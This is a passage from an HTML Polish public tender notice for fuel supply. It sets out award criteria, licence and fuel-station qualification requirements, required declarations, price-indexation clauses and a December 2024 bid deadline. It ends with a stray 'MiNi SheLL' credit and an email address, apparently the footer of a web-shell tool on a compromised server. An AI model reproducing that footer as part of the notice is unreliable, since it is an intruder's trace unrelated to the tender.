<br/>obliczoną według wzoru: NO = KC + KASWP. Maksymalna liczba punktów wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie automatycznego systemu wydawania paliwa” KASWP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1) nie podlegają wykluczeniu; <br/>2) spełniają warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki zgodnie <br/>z art. 112 ust. 2 ustawy Pzp, określone przez Zamawiającego w ogłoszeniu o zamówieniu i <br/>niniejszej SWZ, dotyczące: <br/>1) zdolności do występowania w o obrocie gospodarczym:<br/>posiada aktualną koncesję w zakresie obrotu paliwami ciekłymi, zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2024 r. poz. 266 z późn. zm.); <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: - Zamawiający nie określa warunku w tym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej: - Zamawiający nie określa warunku w tym zakresie. <br/>4) zdolności technicznej lub zawodowej: dysponuje bądź będzie dysponował co najmniej jedną stacją paliw zlokalizowaną zgodnie z warunkiem określonym w Rozdziale IV ust. 3 SWZ. <br/>3. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i zawodowy. <br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów <br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <br/>5. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli <br/>podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <br/>6. Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania przez Wykonawcę firm (nazw) podwykonawców (o ile są mu znane na tym etapie postępowania). Informacji należy udzielić na formularzu ofertowym. W przypadku, gdy Wykonawca nie powierza wykonania żadnej <br/>części zamówienia podwykonawcom, należy zamieścić informację „nie dotyczy”. <br/>7. <br/>Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy lub dalszego <br/>podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub dalszego podwykonawcę, bądź zrezygnować z powierzenia wykonania <br/>części zamówienia podwykonawcy lub dalszemu podwykonawcy. <br/>8. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wraz z ofertą Wykonawca<br/> jest zobowiązany złożyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania na mocy art.<br/> 108 ust. 1 ustawy Pzp oraz art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/> wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497 z późn. zm.)<br/> zgodne ze wzorem określonym w załączniku nr 2 do SWZ. Oświadczenie składa się, pod rygorem nieważności, w formie<br/> elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Informacje zawarte w<br/> oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania.<br/> 2. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu Wykonawca, którego oferta zostanie oceniona<br/> najwyżej, na wezwanie Zamawiającego przedłoży oświadczenie w zakresie 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do<br/> tej samej grupy kapitałowej z innym wykonawcą, który złożył odrębną ofertę w postępowaniu. Oświadczenie sporządzić należy<br/> zgodnie z załącznikiem nr 10 do SWZ, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wraz z ofertą Wykonawca jest zobowiązany złożyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/> postępowaniu – zgodne ze wzorem określonym w załączniku nr 3 do SWZ. Oświadczenie składa się, pod rygorem nieważności, w<br/> formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Informacje zawarte w<br/> oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu.<br/>2. W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca, którego oferta zostanie oceniona najwyżej, na<br/> wezwanie Zamawiającego przedłoży: <br/>a) aktualną koncesję w zakresie obrotu paliwami ciekłymi, zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2024 r. poz. 266 z późn. zm.); <br/>b) wykaz stacji paliw dostępnych Wykonawcy przeznaczonych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami – wg wzoru określonego w załączniku nr 5 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/> 1) Oświadczenia:<br/> a) o niepodleganiu wykluczeniu z postępowania na mocy art. 108 ust. 1 ustawy Pzp oraz art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497 z późn. zm.) – zgodne ze wzorem określonym w załączniku nr 2 do SWZ,<br/>b) o spełnianiu warunków udziału w postępowaniu – zgodne ze wzorem określonym w załączniku nr 3 do SWZ, składa każdy z Wykonawców wspólnie ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/> warunków udziału w postępowaniu.<br/> 2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.<br/> 3) Wykonawcy składają oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - zgodne ze wzorem określonym w załączniku nr 4 do SWZ.<br/> 4) W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia kopii umowy regulującej współpracę tych Wykonawców.<br/> 5) Oświadczenia i pełnomocnictwo składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień niniejszej mowy może nastąpić za zgodą stron wyrażoną na piśmie w formie pisemnego aneksu do umowy pod rygorem nieważności. <br/>2.	Zmiana postanowień umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez: <br/>1)	zmianę terminu realizacji przedmiotu umowy o okres odpowiadający wstrzymaniu lub opóźnieniu tego terminu w przypadku: <br/>a)	wystąpienia okoliczności spowodowanych siłą wyższą, w tym wystąpieniem zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach albo działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, <br/>b)	wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego lub niezależnych od obu Stron, które skutkowały wstrzymaniem wykonywania przedmiotu umowy lub opóźnieniem w jej zawarciu – np. przedłużeniem się procedury postępowania o udzielenie zamówienia publicznego spowodowanym przez innego Wykonawcę; <br/>2)	zmianę sposobu wykonania przedmiotu umowy lub obniżenia wynagrodzenia, gdy ulegnie zmianie stan prawny, w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania przedmiotu umowy przez Wykonawcę, <br/>3)	zmianę ceny w przypadku ustawowej zmiany stawki podatku VAT, w ten sposób, że wynagrodzenie netto pozostaje bez zmian, a zmianie ulega tylko wysokość podatku VAT. <br/>3.	Zmiany umowy, o których mowa w ust. 1-2 nie mogą prowadzić do zwiększenia ceny przedmiotu umowy, ani powodować po stronie Zamawiającego dodatkowych kosztów. <br/>4.	Nie stanowią podstawy do zmiany postanowień umowy zmiany dotyczące: <br/>1)	danych związanych z obsługą administracyjno-organizacyjną umowy, w szczególności zmiana numeru rachunku bankowego; <br/>2)	danych teleadresowych; <br/>3)	osób upoważnionych wskazanych w umowie; <br/>4)	danych rejestrowych; <br/>5)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy. <br/>5. W przypadku zmian o których mowa w ust. 4 strony zobowiązane są do zawiadomienia drugiej strony w formie pisemnej pod rygorem nieważności.<br/>6. W związku z planowanym zawarciem umowy na okres dłuższy niż 6 miesięcy, zgodnie z art. 439 ustawy Pzp Zamawiający wskazuje, że:<br/>a) w związku ze specyfiką zmian cen na rynku paliw waloryzacja umowy może nastąpić po 5 miesiącach realizacji przedmiotu umowy w sytuacji gdy cena przedmiotu umowy wzrośnie u oferowanego Producenta paliw o 5 % od ceny oferowanej. <br/>b) zmiana cen paliw u Producenta ma każdorazowo bezpośredni wpływ na cenę konkretnej zrealizowanej po terminie o którym mowa w pkt a dostawy.<br/>c) ustalenie cen paliwa u Producenta, o którym mowa w pkt b) następuje na podstawie cennika opublikowanego w dniu zrealizowania dostawy na oficjalnej stronie internetowej Producenta, którego Wykonawca paliwo oferuje.<br/>d) Pierwsza waloryzacja nastąpi na wniosek Wykonawcy po terminie o którym mowa w pkt a natomiast kolejna waloryzacja cen może nastąpić po kolejnych 2 miesiącach realizacji dostawy. w momencie rozliczenia ostatniej dostawy.<br/>e) Zmiana wynagrodzenia może nastąpić wyłącznie do niezrealizowanej części zamówienia.<br/>f) Łączna wysokość wszystkich zmian nie może przekroczyć 20% kwoty wynagrodzenia brutto, o którym mowa w § 5 ust. 1 umowy.<br/>g) Maksymalna wysokość wynagrodzenia, o którym mowa w § 5 ust. 1 pozostaje bez zmian.<br/>h) W przypadku wyczerpania kwoty, o której mowa w § 5 ust. 1, umowa wygasa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/186533/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com